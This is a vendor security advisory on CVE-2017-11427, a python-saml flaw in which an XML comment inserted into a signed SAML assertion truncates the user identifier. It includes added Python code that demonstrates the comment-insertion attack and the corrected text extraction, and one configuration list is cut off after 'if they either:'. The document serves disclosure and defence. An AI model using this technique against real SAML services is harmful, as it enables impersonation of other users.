Advisory ID: DUO-PSA-2017-003
Publication Date: 2018-02-27
Revision Date: 2018-02-27
Status: Confirmed, Fixed
Document Revision: 1
Duo Security has identified a security flaw in a third-party library used in the Duo Network Gateway (DNG) which, under certain configurations, could allow for a bypass of the DNG's SAML first factor of authentication.
Duo has discovered an implementation flaw in the open-source library 'python-saml' (CVE-2017-11427) that, under certain conditions, could allow an attacker with authenticated access to a SAML Identity Provider (IdP) to bypass the first factor of authentication for a different user.
This issue stems from inconsistent handling of comment nodes across XML DOM traversal APIs. Comment nodes should have no effect on the meaning of a document, and indeed, because the XML is canonicalized before signature verification (and that canonicalization discards comments), inserting an XML comment into a SAML message does not invalidate its signature. However, 'python-saml' reads an element's text through a DOM-traversal API that returns only the text preceding the element's first child node, so for an element that contains a comment it fails to extract the full inner text: all of the text after the comment is lost.
To exploit this issue, an attacker inserts XML comments at selected locations within the SAML assertion before forwarding it to the DNG. The DNG validates the signature successfully (the comment does not change the canonical form) but then extracts only the portion of the user identifier that precedes the comment. Where an attacker's own identifier (e.g. john_doe) can be truncated into a victim's identifier (e.g. john), the attacker can thereby trick the DNG into authenticating as the victim.
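The following Python example is added here to illustrate the mechanism; it is not part of Duo's advisory and is not python-saml's code. It uses only the standard library's xml.dom.minidom (python-saml uses lxml), and the "first text node only" read is the minidom analogue of the lossy DOM access the advisory describes. The function names, the sample assertion fragment and the comment-stripping digest helper are all constructed for illustration: the digest merely drops comment nodes before hashing, as a stand-in for canonicalization, and is not a real XML-DSig or exclusive C14N implementation.

```python
"""Reproduces the comment-truncation flaw described above (CVE-2017-11427).

Standard library only (xml.dom.minidom); python-saml itself uses lxml.
All names, the sample assertion fragment and the digest helper are
constructed for this illustration. The digest is a stand-in for
canonicalization (it only drops comment nodes before hashing), not a real
XML-DSig or exclusive C14N implementation.
"""
import hashlib
from xml.dom import minidom
from xml.dom.minidom import Element, Node

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed sample: a minimal assertion fragment carrying the attacker's
# own, legitimately issued identifier.
ORIGINAL = (
    '<saml:Assertion xmlns:saml="%s">'
    '<saml:Subject><saml:NameID>john_doe</saml:NameID></saml:Subject>'
    '</saml:Assertion>' % SAML_NS
)


def _name_id(xml_text: str) -> Element:
    doc = minidom.parseString(xml_text)
    return doc.getElementsByTagNameNS(SAML_NS, "NameID")[0]


def vulnerable_name_id(xml_text: str) -> str:
    """Lossy pattern: read only the element's first text node.

    A comment splits the text into two nodes, so everything after the
    comment is silently dropped. This mirrors the behaviour the advisory
    describes for python-saml.
    """
    first = _name_id(xml_text).firstChild
    if first is None or first.nodeType != Node.TEXT_NODE:
        return ""
    return first.data


def fixed_name_id(xml_text: str) -> str:
    """Correct pattern: concatenate every text/CDATA child, skip comments."""
    return "".join(
        child.data
        for child in _name_id(xml_text).childNodes
        if child.nodeType in (Node.TEXT_NODE, Node.CDATA_SECTION_NODE)
    )


def insert_comment(xml_text: str, keep: str) -> str:
    """Attacker step: split the NameID text after `keep` with an empty comment."""
    el = _name_id(xml_text)
    full = "".join(c.data for c in el.childNodes if c.nodeType == Node.TEXT_NODE)
    if not full.startswith(keep):
        raise ValueError("NameID %r does not start with %r" % (full, keep))
    doc = el.ownerDocument
    for child in list(el.childNodes):
        el.removeChild(child)
    el.appendChild(doc.createTextNode(keep))
    el.appendChild(doc.createComment(""))  # serialises as <!---->
    el.appendChild(doc.createTextNode(full[len(keep):]))
    return doc.documentElement.toxml()


def comment_free_digest(xml_text: str) -> str:
    """Hash of the document with all comment nodes removed.

    Canonicalization before signature verification likewise discards
    comments, so a signature over the canonical form is unaffected by
    the inserted comment.
    """
    doc = minidom.parseString(xml_text)

    def strip(node: Node) -> None:
        for child in list(node.childNodes):
            if child.nodeType == Node.COMMENT_NODE:
                node.removeChild(child)
            else:
                strip(child)

    strip(doc)
    doc.normalize()  # merge the text nodes the comment had split
    return hashlib.sha256(doc.documentElement.toxml().encode()).hexdigest()


if __name__ == "__main__":
    tampered = insert_comment(ORIGINAL, "john")
    print(tampered)
    print("digest unchanged:", comment_free_digest(tampered) == comment_free_digest(ORIGINAL))
    print("vulnerable extraction:", vulnerable_name_id(tampered))  # john
    print("fixed extraction:     ", fixed_name_id(tampered))       # john_doe
```

Run stand-alone, the script prints the tampered assertion, shows that the comment-free digest (the part a signature would cover) is identical for the original and tampered documents, and that the lossy read yields "john" while the corrected read yields "john_doe". The practical fix on the consuming side is the pattern in fixed_name_id: gather all text-bearing children rather than trusting a single "text" accessor, and do so with the same parser and traversal that the signature check used.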
Attackers who have the ability to authenticate as a user may be able to bypass the first factor of authentication for a different user.
Note that, unless the attacker can separately bypass 2FA, this attack would not result in a full bypass of user authentication.
This issue affects DNG versions before version 1.2.10. DNG configurations could be at greater risk, due to increased attacker control over the user being bypassed, if they either:
The issue has been resolved through a patch to the Duo Network Gateway. Please update to DNG version 1.2.10+ using the instructions covered at https://duo.com/docs/dng.
You can check the version of your Duo Network Gateway by following the instructions at https://help.duo.com/s/article/4151.
Vulnerability Class: CWE-287: Improper Authentication
Remotely Exploitable: Yes
Authentication Required: Partial
Severity: Medium
CVSSv2 Overall Score: 5.1
CVSSv2 Group Scores: Base: 6.3, Temporal: 5.1, Environmental: 5.1
CVSSv2 Vector: AV:N/AC:M/Au:S/C:C/I:N/A:N/E:POC/RL:U/RC:UC/CDP:ND/TD:ND/CR:M/IR:L/AR:L
Duo Security would like to thank CERT/CC for their coordination related to the various security disclosure actions conducted during this process.
Technical questions regarding this issue should be sent to support@duosecurity.com and reference "DUO-PSA-2017-003" in the subject.
Other feedback regarding this issue can be sent to security@duosecurity.com.